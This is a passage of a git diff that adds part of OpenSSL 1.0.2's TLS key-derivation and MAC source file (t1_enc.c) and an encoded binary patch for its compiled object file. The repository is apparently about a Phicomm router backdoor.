+        memcpy(header, seq, 8);
+
+    /*
+     * kludge: tls1_cbc_remove_padding passes padding length in rec->type
+     */
+    orig_len = rec->length + md_size + ((unsigned int)rec->type >> 8);
+    rec->type &= 0xff;
+
+    header[8] = rec->type;
+    header[9] = (unsigned char)(ssl->version >> 8);
+    header[10] = (unsigned char)(ssl->version);
+    header[11] = (rec->length) >> 8;
+    header[12] = (rec->length) & 0xff;
+
+    if (!send &&
+        EVP_CIPHER_CTX_mode(ssl->enc_read_ctx) == EVP_CIPH_CBC_MODE &&
+        ssl3_cbc_record_digest_supported(mac_ctx)) {
+        /*
+         * This is a CBC-encrypted record. We must avoid leaking any
+         * timing-side channel information about how many blocks of data we
+         * are hashing because that gives an attacker a timing-oracle.
+         */
+        /* Final param == not SSLv3 */
+        ssl3_cbc_digest_record(mac_ctx,
+                               md, &md_size,
+                               header, rec->input,
+                               rec->length + md_size, orig_len,
+                               ssl->s3->read_mac_secret,
+                               ssl->s3->read_mac_secret_size, 0);
+    } else {
+        EVP_DigestSignUpdate(mac_ctx, header, sizeof(header));
+        EVP_DigestSignUpdate(mac_ctx, rec->input, rec->length);
+        t = EVP_DigestSignFinal(mac_ctx, md, &md_size);
+        OPENSSL_assert(t > 0);
+#ifdef OPENSSL_FIPS
+        if (!send && FIPS_mode())
+            tls_fips_digest_extra(ssl->enc_read_ctx,
+                                  mac_ctx, rec->input, rec->length, orig_len);
+#endif
+    }
+
+    if (!stream_mac)
+        EVP_MD_CTX_cleanup(&hmac);
+#ifdef TLS_DEBUG
+    fprintf(stderr, "seq=");
+    {
+        int z;
+        for (z = 0; z < 8; z++)
+            fprintf(stderr, "%02X ", seq[z]);
+        fprintf(stderr, "\n");
+    }
+    fprintf(stderr, "rec=");
+    {
+        unsigned int z;
+        for (z = 0; z < rec->length; z++)
+            fprintf(stderr, "%02X ", rec->data[z]);
+        fprintf(stderr, "\n");
+    }
+#endif
+
+    if (!SSL_IS_DTLS(ssl)) {
+        for (i = 7; i >= 0; i--) {
+            ++seq[i];
+            if (seq[i] != 0)
+                break;
+        }
+    }
+#ifdef TLS_DEBUG
+    {
+        unsigned int z;
+        for (z = 0; z < md_size; z++)
+            fprintf(stderr, "%02X ", md[z]);
+        fprintf(stderr, "\n");
+    }
+#endif
+    return (md_size);
+}
+
+int tls1_generate_master_secret(SSL *s, unsigned char *out, unsigned char *p,
+                                int len)
+{
+    unsigned char buff[SSL_MAX_MASTER_KEY_LENGTH];
+    const void *co = NULL, *so = NULL;
+    int col = 0, sol = 0;
+
+#ifdef KSSL_DEBUG
+    fprintf(stderr, "tls1_generate_master_secret(%p,%p, %p, %d)\n", s, out, p,
+            len);
+#endif                          /* KSSL_DEBUG */
+
+#ifdef TLSEXT_TYPE_opaque_prf_input
+    if (s->s3->client_opaque_prf_input != NULL
+        && s->s3->server_opaque_prf_input != NULL
+        && s->s3->client_opaque_prf_input_len > 0
+        && s->s3->client_opaque_prf_input_len ==
+        s->s3->server_opaque_prf_input_len) {
+        co = s->s3->client_opaque_prf_input;
+        col = s->s3->server_opaque_prf_input_len;
+        so = s->s3->server_opaque_prf_input;
+        /*
+         * must be same as col (see
+         * draft-resc-00.txts-opaque-prf-input-00.txt, section 3.1)
+         */
+        sol = s->s3->client_opaque_prf_input_len;
+    }
+#endif
+
+    tls1_PRF(ssl_get_algorithm2(s),
+             TLS_MD_MASTER_SECRET_CONST, TLS_MD_MASTER_SECRET_CONST_SIZE,
+             s->s3->client_random, SSL3_RANDOM_SIZE,
+             co, col,
+             s->s3->server_random, SSL3_RANDOM_SIZE,
+             so, sol, p, len, s->session->master_key, buff, sizeof buff);
+#ifdef SSL_DEBUG
+    fprintf(stderr, "Premaster Secret:\n");
+    BIO_dump_fp(stderr, (char *)p, len);
+    fprintf(stderr, "Client Random:\n");
+    BIO_dump_fp(stderr, (char *)s->s3->client_random, SSL3_RANDOM_SIZE);
+    fprintf(stderr, "Server Random:\n");
+    BIO_dump_fp(stderr, (char *)s->s3->server_random, SSL3_RANDOM_SIZE);
+    fprintf(stderr, "Master Secret:\n");
+    BIO_dump_fp(stderr, (char *)s->session->master_key,
+                SSL3_MASTER_SECRET_SIZE);
+#endif
+
+#ifdef OPENSSL_SSL_TRACE_CRYPTO
+    if (s->msg_callback) {
+        s->msg_callback(2, s->version, TLS1_RT_CRYPTO_PREMASTER,
+                        p, len, s, s->msg_callback_arg);
+        s->msg_callback(2, s->version, TLS1_RT_CRYPTO_CLIENT_RANDOM,
+                        s->s3->client_random, SSL3_RANDOM_SIZE,
+                        s, s->msg_callback_arg);
+        s->msg_callback(2, s->version, TLS1_RT_CRYPTO_SERVER_RANDOM,
+                        s->s3->server_random, SSL3_RANDOM_SIZE,
+                        s, s->msg_callback_arg);
+        s->msg_callback(2, s->version, TLS1_RT_CRYPTO_MASTER,
+                        s->session->master_key,
+                        SSL3_MASTER_SECRET_SIZE, s, s->msg_callback_arg);
+    }
+#endif
+
+#ifdef KSSL_DEBUG
+    fprintf(stderr, "tls1_generate_master_secret() complete\n");
+#endif                          /* KSSL_DEBUG */
+    return (SSL3_MASTER_SECRET_SIZE);
+}
+
+int tls1_export_keying_material(SSL *s, unsigned char *out, size_t olen,
+                                const char *label, size_t llen,
+                                const unsigned char *context,
+                                size_t contextlen, int use_context)
+{
+    unsigned char *buff;
+    unsigned char *val = NULL;
+    size_t vallen, currentvalpos;
+    int rv;
+
+#ifdef KSSL_DEBUG
+    fprintf(stderr, "tls1_export_keying_material(%p,%p,%lu,%s,%lu,%p,%lu)\n",
+            s, out, olen, label, llen, context, contextlen);
+#endif                          /* KSSL_DEBUG */
+
+    buff = OPENSSL_malloc(olen);
+    if (buff == NULL)
+        goto err2;
+
+    /*
+     * construct PRF arguments we construct the PRF argument ourself rather
+     * than passing separate values into the TLS PRF to ensure that the
+     * concatenation of values does not create a prohibited label.
+     */
+    vallen = llen + SSL3_RANDOM_SIZE * 2;
+    if (use_context) {
+        vallen += 2 + contextlen;
+    }
+
+    val = OPENSSL_malloc(vallen);
+    if (val == NULL)
+        goto err2;
+    currentvalpos = 0;
+    memcpy(val + currentvalpos, (unsigned char *)label, llen);
+    currentvalpos += llen;
+    memcpy(val + currentvalpos, s->s3->client_random, SSL3_RANDOM_SIZE);
+    currentvalpos += SSL3_RANDOM_SIZE;
+    memcpy(val + currentvalpos, s->s3->server_random, SSL3_RANDOM_SIZE);
+    currentvalpos += SSL3_RANDOM_SIZE;
+
+    if (use_context) {
+        val[currentvalpos] = (contextlen >> 8) & 0xff;
+        currentvalpos++;
+        val[currentvalpos] = contextlen & 0xff;
+        currentvalpos++;
+        if ((contextlen > 0) || (context != NULL)) {
+            memcpy(val + currentvalpos, context, contextlen);
+        }
+    }
+
+    /*
+     * disallow prohibited labels note that SSL3_RANDOM_SIZE > max(prohibited
+     * label len) = 15, so size of val > max(prohibited label len) = 15 and
+     * the comparisons won't have buffer overflow
+     */
+    if (memcmp(val, TLS_MD_CLIENT_FINISH_CONST,
+               TLS_MD_CLIENT_FINISH_CONST_SIZE) == 0)
+        goto err1;
+    if (memcmp(val, TLS_MD_SERVER_FINISH_CONST,
+               TLS_MD_SERVER_FINISH_CONST_SIZE) == 0)
+        goto err1;
+    if (memcmp(val, TLS_MD_MASTER_SECRET_CONST,
+               TLS_MD_MASTER_SECRET_CONST_SIZE) == 0)
+        goto err1;
+    if (memcmp(val, TLS_MD_KEY_EXPANSION_CONST,
+               TLS_MD_KEY_EXPANSION_CONST_SIZE) == 0)
+        goto err1;
+
+    rv = tls1_PRF(ssl_get_algorithm2(s),
+                  val, vallen,
+                  NULL, 0,
+                  NULL, 0,
+                  NULL, 0,
+                  NULL, 0,
+                  s->session->master_key, s->session->master_key_length,
+                  out, buff, olen);
+
+#ifdef KSSL_DEBUG
+    fprintf(stderr, "tls1_export_keying_material() complete\n");
+#endif                          /* KSSL_DEBUG */
+    goto ret;
+ err1:
+    SSLerr(SSL_F_TLS1_EXPORT_KEYING_MATERIAL,
+           SSL_R_TLS_ILLEGAL_EXPORTER_LABEL);
+    rv = 0;
+    goto ret;
+ err2:
+    SSLerr(SSL_F_TLS1_EXPORT_KEYING_MATERIAL, ERR_R_MALLOC_FAILURE);
+    rv = 0;
+ ret:
+    if (buff != NULL)
+        OPENSSL_free(buff);
+    if (val != NULL)
+        OPENSSL_free(val);
+    return (rv);
+}
+
+int tls1_alert_code(int code)
+{
+    switch (code) {
+    case SSL_AD_CLOSE_NOTIFY:
+        return (SSL3_AD_CLOSE_NOTIFY);
+    case SSL_AD_UNEXPECTED_MESSAGE:
+        return (SSL3_AD_UNEXPECTED_MESSAGE);
+    case SSL_AD_BAD_RECORD_MAC:
+        return (SSL3_AD_BAD_RECORD_MAC);
+    case SSL_AD_DECRYPTION_FAILED:
+        return (TLS1_AD_DECRYPTION_FAILED);
+    case SSL_AD_RECORD_OVERFLOW:
+        return (TLS1_AD_RECORD_OVERFLOW);
+    case SSL_AD_DECOMPRESSION_FAILURE:
+        return (SSL3_AD_DECOMPRESSION_FAILURE);
+    case SSL_AD_HANDSHAKE_FAILURE:
+        return (SSL3_AD_HANDSHAKE_FAILURE);
+    case SSL_AD_NO_CERTIFICATE:
+        return (-1);
+    case SSL_AD_BAD_CERTIFICATE:
+        return (SSL3_AD_BAD_CERTIFICATE);
+    case SSL_AD_UNSUPPORTED_CERTIFICATE:
+        return (SSL3_AD_UNSUPPORTED_CERTIFICATE);
+    case SSL_AD_CERTIFICATE_REVOKED:
+        return (SSL3_AD_CERTIFICATE_REVOKED);
+    case SSL_AD_CERTIFICATE_EXPIRED:
+        return (SSL3_AD_CERTIFICATE_EXPIRED);
+    case SSL_AD_CERTIFICATE_UNKNOWN:
+        return (SSL3_AD_CERTIFICATE_UNKNOWN);
+    case SSL_AD_ILLEGAL_PARAMETER:
+        return (SSL3_AD_ILLEGAL_PARAMETER);
+    case SSL_AD_UNKNOWN_CA:
+        return (TLS1_AD_UNKNOWN_CA);
+    case SSL_AD_ACCESS_DENIED:
+        return (TLS1_AD_ACCESS_DENIED);
+    case SSL_AD_DECODE_ERROR:
+        return (TLS1_AD_DECODE_ERROR);
+    case SSL_AD_DECRYPT_ERROR:
+        return (TLS1_AD_DECRYPT_ERROR);
+    case SSL_AD_EXPORT_RESTRICTION:
+        return (TLS1_AD_EXPORT_RESTRICTION);
+    case SSL_AD_PROTOCOL_VERSION:
+        return (TLS1_AD_PROTOCOL_VERSION);
+    case SSL_AD_INSUFFICIENT_SECURITY:
+        return (TLS1_AD_INSUFFICIENT_SECURITY);
+    case SSL_AD_INTERNAL_ERROR:
+        return (TLS1_AD_INTERNAL_ERROR);
+    case SSL_AD_USER_CANCELLED:
+        return (TLS1_AD_USER_CANCELLED);
+    case SSL_AD_NO_RENEGOTIATION:
+        return (TLS1_AD_NO_RENEGOTIATION);
+    case SSL_AD_UNSUPPORTED_EXTENSION:
+        return (TLS1_AD_UNSUPPORTED_EXTENSION);
+    case SSL_AD_CERTIFICATE_UNOBTAINABLE:
+        return (TLS1_AD_CERTIFICATE_UNOBTAINABLE);
+    case SSL_AD_UNRECOGNIZED_NAME:
+        return (TLS1_AD_UNRECOGNIZED_NAME);
+    case SSL_AD_BAD_CERTIFICATE_STATUS_RESPONSE:
+        return (TLS1_AD_BAD_CERTIFICATE_STATUS_RESPONSE);
+    case SSL_AD_BAD_CERTIFICATE_HASH_VALUE:
+        return (TLS1_AD_BAD_CERTIFICATE_HASH_VALUE);
+    case SSL_AD_UNKNOWN_PSK_IDENTITY:
+        return (TLS1_AD_UNKNOWN_PSK_IDENTITY);
+    case SSL_AD_INAPPROPRIATE_FALLBACK:
+        return (TLS1_AD_INAPPROPRIATE_FALLBACK);
+#if 0
+        /* not appropriate for TLS, not used for DTLS */
+    case DTLS1_AD_MISSING_HANDSHAKE_MESSAGE:
+        return (DTLS1_AD_MISSING_HANDSHAKE_MESSAGE);
+#endif
+    default:
+        return (-1);
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..eaca161e691cfbac1b3fb51a8ccb1afd863d518b
GIT binary patch
literal 16592
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
